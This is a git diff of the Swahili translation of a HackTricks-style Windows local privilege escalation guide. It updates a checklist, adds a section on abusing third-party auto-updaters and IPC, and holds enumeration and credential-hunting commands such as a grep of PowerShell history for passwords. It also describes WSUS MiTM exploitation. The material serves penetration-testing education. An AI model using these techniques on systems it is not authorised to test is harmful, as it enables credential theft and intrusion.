diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 343cdd455..9a62d47c5 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -236,6 +236,7 @@ - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md) - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md) - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md) + - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md) - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md) - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md) - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md) diff --git a/src/windows-hardening/checklist-windows-privilege-escalation.md b/src/windows-hardening/checklist-windows-privilege-escalation.md index 32fce6a81..a4d6db960 100644 --- a/src/windows-hardening/checklist-windows-privilege-escalation.md +++ b/src/windows-hardening/checklist-windows-privilege-escalation.md 
@@ -1,114 +1,115 @@ -# Orodha - Kuinua Haki za Windows za Mitaa +# Orodha ya ukaguzi - Local Windows Privilege Escalation {{#include ../banners/hacktricks-training.md}} -### **Zana bora ya kutafuta njia za kuinua haki za Windows za ndani:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +### **Zana bora ya kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) -### [Taarifa za Mfumo](windows-local-privilege-escalation/index.html#system-info) +### [System Info](windows-local-privilege-escalation/index.html#system-info) -- [ ] Pata [**Taarifa za mfumo**](windows-local-privilege-escalation/index.html#system-info) -- [ ] Tafuta **kernel** [**exploits kwa kutumia scripts**](windows-local-privilege-escalation/index.html#version-exploits) -- [ ] Tumia **Google kutafuta** **exploits** za kernel -- [ ] Tumia **searchsploit kutafuta** **exploits** za kernel -- [ ] Taarifa za kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)? -- [ ] Nywila katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)? +- [ ] Pata [**System information**](windows-local-privilege-escalation/index.html#system-info) +- [ ] Tafuta **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits) +- [ ] Tumia **Google to search** for kernel **exploits** +- [ ] Tumia **searchsploit to search** for kernel **exploits** +- [ ] Kuna taarifa ya kuvutia katika [**env vars**](windows-local-privilege-escalation/index.html#environment)? +- [ ] Manenosiri katika [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)? - [ ] Taarifa za kuvutia katika [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)? 
- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)? - [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)? +- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md) - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)? -### [Kuhesabu/AV enumeration](windows-local-privilege-escalation/index.html#enumeration) +### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration) -- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings)na [**WEF** ](windows-local-privilege-escalation/index.html#wef)settings +- [ ] Angalia [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) na [**WEF** ](windows-local-privilege-escalation/index.html#wef) mipangilio - [ ] Angalia [**LAPS**](windows-local-privilege-escalation/index.html#laps) -- [ ] Angalia kama [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest)iko hai +- [ ] Angalia ikiwa [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) inafanya kazi - [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)? - [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials) - [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)? -- [ ] Angalia kama kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) +- [ ] Angalia ikiwa kuna [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md) - [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)? 
- [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md) - [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups) -- [ ] Angalia [**haki za**] **mtumiaji wa sasa** (windows-local-privilege-escalation/index.html#users-and-groups) -- [ ] Je, wewe ni [**mwanachama wa kikundi chochote chenye haki**](windows-local-privilege-escalation/index.html#privileged-groups)? -- [ ] Angalia kama una [mifumo hii ya tokens iliyoanzishwa](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? -- [ ] [**Sessions za Watumiaji**](windows-local-privilege-escalation/index.html#logged-users-sessions)? -- [ ] Angalia [**nyumba za watumiaji**](windows-local-privilege-escalation/index.html#home-folders) (ufikiaji?) -- [ ] Angalia [**Sera ya Nywila**](windows-local-privilege-escalation/index.html#password-policy) -- [ ] Nini kiko [**ndani ya Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)? +- [ ] Angalia [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups) +- [ ] Je, wewe ni [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)? +- [ ] Angalia ikiwa una [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? +- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)? 
+- [ ] Angalia[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (ufikia?) +- [ ] Angalia [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy) +- [ ] Nini kimepo[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)? -### [Mtandao](windows-local-privilege-escalation/index.html#network) +### [Network](windows-local-privilege-escalation/index.html#network) -- [ ] Angalia **taarifa za sasa za** [**mtandao**](windows-local-privilege-escalation/index.html#network) -- [ ] Angalia **huduma za ndani zilizofichwa** zilizozuiliwa kwa nje +- [ ] Angalia **current** [**network** **information**](windows-local-privilege-escalation/index.html#network) +- [ ] Angalia **hidden local services** zinazopatikana kutoka nje -### [Mchakato unaoendelea](windows-local-privilege-escalation/index.html#running-processes) +### [Running Processes](windows-local-privilege-escalation/index.html#running-processes) -- [ ] Mchakato wa binaries [**file na ruhusa za folda**](windows-local-privilege-escalation/index.html#file-and-folder-permissions) -- [ ] [**Kuchimba nywila za kumbukumbu**](windows-local-privilege-escalation/index.html#memory-password-mining) -- [ ] [**Programu za GUI zisizo salama**](windows-local-privilege-escalation/index.html#insecure-gui-apps) -- [ ] Pora nywila na **michakato ya kuvutia** kupitia `ProcDump.exe` ? (firefox, chrome, nk ...) +- [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions) +- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining) +- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps) +- [ ] Pora credentials kwa **interesting processes** kwa kutumia `ProcDump.exe` ? (firefox, chrome, etc ...) 
-### [Huduma](windows-local-privilege-escalation/index.html#services) +### [Services](windows-local-privilege-escalation/index.html#services) -- [ ] [Je, unaweza **kubadilisha huduma yoyote**?](windows-local-privilege-escalation/index.html#permissions) -- [ ] [Je, unaweza **kubadilisha** **binary** inayotekelezwa na **huduma yoyote**?](windows-local-privilege-escalation/index.html#modify-service-binary-path) -- [ ] [Je, unaweza **kubadilisha** **registry** ya **huduma yoyote**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions) -- [ ] [Je, unaweza kunufaika na **path** ya **binary** ya **huduma isiyo na quote**?](windows-local-privilege-escalation/index.html#unquoted-service-paths) +- [ ] [Can you **modify any service**?](windows-local-privilege-escalation/index.html#permissions) +- [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/index.html#modify-service-binary-path) +- [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions) +- [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/index.html#unquoted-service-paths) -### [**Programu**](windows-local-privilege-escalation/index.html#applications) +### [**Applications**](windows-local-privilege-escalation/index.html#applications) -- [ ] **Andika** [**ruhusa kwenye programu zilizowekwa**](windows-local-privilege-escalation/index.html#write-permissions) -- [ ] [**Programu za Kuanzisha**](windows-local-privilege-escalation/index.html#run-at-startup) -- [ ] **Wasiwasi** [**Madereva**](windows-local-privilege-escalation/index.html#drivers) +- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions) +- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup) +- [ ] **Vulnerable** 
[**Drivers**](windows-local-privilege-escalation/index.html#drivers) ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking) -- [ ] Je, unaweza **kuandika katika folda yoyote ndani ya PATH**? -- [ ] Je, kuna binary ya huduma inayojulikana ambayo **inajaribu kupakia DLL isiyokuwepo**? -- [ ] Je, unaweza **kuandika** katika **folda za binaries**? +- [ ] Je, unaweza **write in any folder inside PATH**? +- [ ] Je, kuna binary ya huduma inayojulikana ambayo **tries to load any non-existant DLL**? +- [ ] Je, unaweza **write** in any **binaries folder**? -### [Mtandao](windows-local-privilege-escalation/index.html#network) +### [Network](windows-local-privilege-escalation/index.html#network) -- [ ] Hesabu mtandao (shares, interfaces, routes, neighbours, ...) -- [ ] Angalia kwa makini huduma za mtandao zinazokisikiliza kwenye localhost (127.0.0.1) +- [ ] Orodhesha mtandao (shares, interfaces, routes, neighbours, ...) +- [ ] Angalia kwa makini network services listening on localhost (127.0.0.1) -### [Nywila za Windows](windows-local-privilege-escalation/index.html#windows-credentials) +### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials) -- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)nywila -- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) nywila ambazo unaweza kutumia? -- [ ] Taarifa za kuvutia [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)? -- [ ] Nywila za mitandao ya [**Wifi zilizohifadhiwa**](windows-local-privilege-escalation/index.html#wifi)? -- [ ] Taarifa za kuvutia katika [**RDP Connections zilizohifadhiwa**](windows-local-privilege-escalation/index.html#saved-rdp-connections)? -- [ ] Nywila katika [**amri zilizokimbizwa hivi karibuni**](windows-local-privilege-escalation/index.html#recently-run-commands)? 
-- [ ] [**Meneja wa Nywila za Desktop ya KijRemote**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) nywila? -- [ ] [**AppCmd.exe** ipo](windows-local-privilege-escalation/index.html#appcmd-exe)? Nywila? +- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials +- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials ambazo unaweza kutumia? +- [ ] Taarifa za kuvutia katika [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)? +- [ ] Manenosiri za mitandao zilizohifadhiwa za [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)? +- [ ] Taarifa za kuvutia katika [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)? +- [ ] Manenosiri katika [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)? +- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) manenosiri? +- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials? - [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading? -### [Faili na Registry (Nywila)](windows-local-privilege-escalation/index.html#files-and-registry-credentials) +### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials) -- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **na** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys) -- [ ] [**SSH keys katika registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)? -- [ ] Nywila katika [**faili zisizokuwa na mtu**](windows-local-privilege-escalation/index.html#unattended-files)? 
-- [ ] Backup yoyote ya [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups)? +- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys) +- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)? +- [ ] Manenosiri katika [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)? +- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup? - [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)? -- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) faili? +- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file? - [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)? -- [ ] Nywila katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)? +- [ ] Nenosiri katika [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)? - [ ] Taarifa za kuvutia katika [**web** **logs**](windows-local-privilege-escalation/index.html#logs)? -- [ ] Je, unataka [**kuomba nywila**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji? -- [ ] Taarifa za kuvutia [**ndani ya Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)? -- [ ] Registry nyingine [**ikiwemo nywila**](windows-local-privilege-escalation/index.html#inside-the-registry)? -- [ ] Ndani ya [**data za kivinjari**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, historia, alama, ...)? 
-- [ ] [**Utafutaji wa nywila wa jumla**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry -- [ ] [**Zana**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za kutafuta nywila kiotomatiki +- [ ] Unataka [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) kwa mtumiaji? +- [ ] Taarifa za kuvutia katika [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)? +- [ ] Mengine [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)? +- [ ] Ndani ya [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)? +- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry +- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords ### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers) -- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na msimamizi? +- [ ] Je, una ufikiaji wa handler yoyote ya mchakato unaoendeshwa na administrator? ### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation) -- [ ] Angalia kama unaweza kuitumia +- [ ] Angalia ikiwa unaweza kuitumia vibaya {{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index 0c91c01ce..e1d225d44 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md 
@@ -8,7 +8,7 @@ ### Access Tokens -**Ikiwa haufahamu Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** +**Ikiwa hujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} @@ -17,7 +17,7 @@ access-tokens.md ### ACLs - DACLs/SACLs/ACEs -**Angalia ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** +**Angalia ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** {{#ref}} @@ -26,27 +26,27 @@ acls-dacls-sacls-aces.md ### Integrity Levels -**Ikiwa haufahamu integrity levels katika Windows, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** +**Ikiwa hujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} integrity-levels.md {{#endref}} -## Windows Security Controls +## Udhibiti wa Usalama wa Windows -Kuna mambo tofauti katika Windows yanayoweza **kukuzuia kuorodhesha mfumo**, kuendesha executables au hata **kutambua shughuli zako**. Unapaswa **kusoma** **ukurasa** ufuatao na **kuorodhesha** hizi zote za **mbinu** za **ulinzi** kabla ya kuanza upembuzi wa privilege escalation: +Kuna mambo tofauti ndani ya Windows ambayo yanaweza **prevent you from enumerating the system**, kuendesha executables au hata **detect your activities**. Unapaswa **soma** {{#raw}}**{{/raw}} ukurasa ufuatao na **kuorodhesha** zote hizi **mbinu** **za ulinzi** kabla ya kuanza privilege escalation enumeration: {{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}} -## System Info +## Taarifa za Mfumo ### Version info enumeration -Angalia kama toleo la Windows lina udhaifu wowote unaojulikana (angalia pia patches zilizowekwa). +Angalia ikiwa toleo la Windows lina udhaifu lolote linalojulikana (angalia pia patches zilizowekwa). ```bash systeminfo systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information 
@@ -61,21 +61,21 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches ``` ### Version Exploits -Tovuti hii [site](https://msrc.microsoft.com/update-guide/vulnerability) inafaa kwa kutafuta taarifa za kina kuhusu Microsoft security vulnerabilities. Hifadhidata hii ina zaidi ya 4,700 security vulnerabilities, ikionyesha the **massive attack surface** ambayo mazingira ya Windows yanatoa. +Hii [site](https://msrc.microsoft.com/update-guide/vulnerability) ni ya msaada kutafuta taarifa za kina kuhusu udhaifu wa usalama wa Microsoft. Hifadhidata hii ina zaidi ya 4,700 udhaifu wa usalama, ikionyesha **massive attack surface** ambayo mazingira ya Windows yanayoonyesha. **Kwenye mfumo** - _post/windows/gather/enum_patches_ - _post/multi/recon/local_exploit_suggester_ - [_watson_](https://github.com/rasta-mouse/Watson) -- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas ina watson imejumuishwa)_ +- [_winpeas_](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) _(Winpeas has watson embedded)_ -**Kialokalini na taarifa za mfumo** +**Kwenye mashinani na taarifa za mfumo** - [https://github.com/AonCyberLabs/Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - [https://github.com/bitsadmin/wesng](https://github.com/bitsadmin/wesng) -**Github repos za exploits:** +**Github repos of exploits:** - [https://github.com/nomi-sec/PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub) - [https://github.com/abatchy17/WindowsExploits](https://github.com/abatchy17/WindowsExploits) 
@@ -83,13 +83,13 @@ Tovuti hii [site](https://msrc.microsoft.com/update-guide/vulnerability) inafaa ### Mazingira -Kuna credential/Juicy info yoyote iliyohifadhiwa katika env variables? +Je, kuna credential/Juicy info zilizohifadhiwa katika env variables? ```bash set dir env: Get-ChildItem Env: | ft Key,Value -AutoSize ``` -### Historia ya PowerShell +### PowerShell Historia ```bash ConsoleHost_history #Find the PATH where is saved @@ -99,9 +99,9 @@ type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.tx cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw ``` -### Faili za transkripti za PowerShell +### PowerShell Transcript files -Unaweza kujifunza jinsi ya kuamilisha hili kwenye [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) +Unaweza kujifunza jinsi ya kuwasha hili katika [https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/](https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/) ```bash #Check is enable in the registry reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription @@ -116,7 +116,7 @@ Stop-Transcript ``` ### PowerShell Module Logging -Maelezo ya utekelezaji wa PowerShell pipeline yanarekodiwa, ikiwa ni pamoja na amri zilizotekelezwa, miito ya amri, na sehemu za scripts. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya output huenda yasirekodiwe. +Maelezo ya utekelezaji wa pipeline za PowerShell yanarekodiwa, yakijumuisha amri zilizotekelezwa, miito ya amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya pato yanaweza kutochukuliwa. Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya nyaraka, ukichagua **"Module Logging"** badala ya **"Powershell Transcription"**. ```bash 
@@ -125,20 +125,20 @@ reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging ``` -Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell unaweza kutekeleza: +Ili kuona hafla 15 za mwisho kutoka kwenye PowersShell logs, unaweza kuendesha: ```bash Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView ``` ### PowerShell **Script Block Logging** -Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inarekodiwa, ikihakikisha kwamba kila block ya msimbo imeandikishwa wakati inavyotekelezwa. Mchakato huu unahifadhi njia kamili ya ufuatiliaji ya kila shughuli, ambayo ni muhimu kwa forensiki na uchambuzi wa tabia zenye madhara. Kwa kurekodi shughuli zote wakati wa utekelezaji, hupatikana maarifa ya kina kuhusu mchakato. +Rekodi kamili ya shughuli na ya maudhui yote ya utekelezaji wa script inahifadhiwa, ikihakikisha kuwa kila sehemu ya msimbo imeandikwa wakati inavyoendeshwa. Mchakato huu unahifadhi njia kamili ya ukaguzi wa kila shughuli, yenye thamani kwa forensiki na uchambuzi wa tabia zenye madhara. Kwa kuandika shughuli zote wakati wa utekelezaji, inatoa ufahamu wa kina kuhusu mchakato. 
```bash reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging ``` -Matukio zilizoandikwa za Script Block zinaweza kupatikana ndani ya Windows Event Viewer katika njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ +Matukio ya Script Block yanaweza kupatikana ndani ya Windows Event Viewer kwenye njia: **Application and Services Logs > Microsoft > Windows > PowerShell > Operational**.\ Ili kuona matukio 20 ya mwisho unaweza kutumia: ```bash Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview @@ -156,9 +156,9 @@ Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ``` ## WSUS -Unaweza kudhoofisha mfumo ikiwa sasisho hazitatafutwa kwa kutumia http**S** bali http. +Unaweza kupata udhibiti wa mfumo ikiwa sasisho hazitaombwa kwa http**S** bali kwa http. -Unaanza kwa kuangalia kama mtandao unatumia non-SSL WSUS update kwa kuendesha yafuatayo katika cmd: +Anza kwa kukagua kama mtandao unatumia sasisho za WSUS zisizo za SSL kwa kuendesha yafuatayo katika cmd: ``` reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer ``` @@ -166,7 +166,7 @@ Au yafuatayo katika PowerShell: ``` Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer" ``` -Ikiwa unapata jibu kama mojawapo ya haya: +Ikiwa utapokea jibu kama moja ya hizi: ```bash HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535 
@@ -182,11 +182,11 @@ PSProvider : Microsoft.PowerShell.Core\Registry ``` Na ikiwa `HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer` au `Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver"` ni sawa na `1`. -Then, **it is exploitable.** Ikiwa registry ya mwisho ni sawa na `0`, basi entry ya WSUS itatawazwa (it will be ignored). +Basi, **inaweza kutumiwa.** Ikiwa rekodi ya mwisho ya rejista ni sawa na 0, basi ingizo la WSUS litaachwa. -Ili ku-exploit vulnerabilities hizi unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic. +Ili kutekeleza udhaifu huu unaweza kutumia zana kama: [Wsuxploit](https://github.com/pimps/wsuxploit), [pyWSUS ](https://github.com/GoSecure/pywsus) - Hizi ni skripti za exploit zilizotengenezwa kwa matumizi ya MiTM ili kuingiza masasisho 'bandia' kwenye trafiki ya WSUS isiyo ya SSL. -Read the research here: +Soma utafiti hapa: {{#file}} CTX_WSUSpect_White_Paper (1).pdf 
@@ -195,25 +195,33 @@ CTX_WSUSpect_White_Paper (1).pdf **WSUS CVE-2020-1013** [**Read the complete report here**](https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/).\ -Kwa msingi, hii ndio flaw ambayo bug hii inatumia: +Kwa kifupi, hili ndilo kosa ambalo mdororo huu unalenga kutumia: -> If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run [PyWSUS](https://github.com/GoSecure/pywsus) locally to intercept our own traffic and run code as an elevated user on our asset. +> Ikiwa tuna uwezo wa kubadilisha proxy ya mtumiaji wetu wa ndani, na Windows Updates inatumia proxy iliyowekwa katika mipangilio ya Internet Explorer, basi tuna uwezo wa kuendesha [PyWSUS](https://github.com/GoSecure/pywsus) ndani ya mashine yetu ili kukamata trafiki yetu wenyewe na kuendesha msimbo kama mtumiaji mwenye viwango vilivyoongezwa. > -> Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service. +> Zaidi ya hayo, kwa kuwa huduma ya WSUS inatumia mipangilio ya mtumiaji wa sasa, itatumia pia duka la vyeti la mtumiaji huo. Ikiwa tutatengeneza cheti kilichojiwekea kwa jina la mwenyeji wa WSUS na kuongeza cheti hicho kwenye duka la vyeti la mtumiaji wa sasa, tutaweza kukamata trafiki ya WSUS ya HTTP na HTTPS. WSUS haina mbinu kama HSTS za kutekeleza uthibitisho wa kuamini-mara-ya-mwanzo kwenye cheti. 
Ikiwa cheti kinachowasilishwa kinatambulika na mtumiaji na kina jina sahihi la mwenyeji, kitakubaliwa na huduma. -Unaweza ku-exploit vulnerability hii kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (once it's liberated). +Unaweza kutekeleza udhaifu huu kwa kutumia zana [**WSUSpicious**](https://github.com/GoSecure/wsuspicious) (mara itakapotolewa). + +## Third-Party Auto-Updaters and Agent IPC (local privesc) + +Wakala wengi wa kampuni huweka uso wa localhost IPC na njia ya masasisho yenye ruhusa. Ikiwa usajili unaweza kulazimishwa kwa seva ya mshambuliaji na updater inamtumaini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kusambaza MSI mbaya ambayo huduma ya SYSTEM itaisakinisha. Angalia mbinu ya jumla (inayotegemea mnyororo wa Netskope stAgentSvc – CVE-2025-0309) hapa: + +{{#ref}} +abusing-auto-updaters-and-ipc.md +{{#endref}} ## KrbRelayUp -Kuna vulnerability ya **local privilege escalation** katika mazingira ya Windows **domain** chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo **LDAP signing is not enforced,** watumiaji wana self-rights zinazoruhusu wao kusanidi **Resource-Based Constrained Delegation (RBCD),** na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kuwa mahitaji haya (requirements) 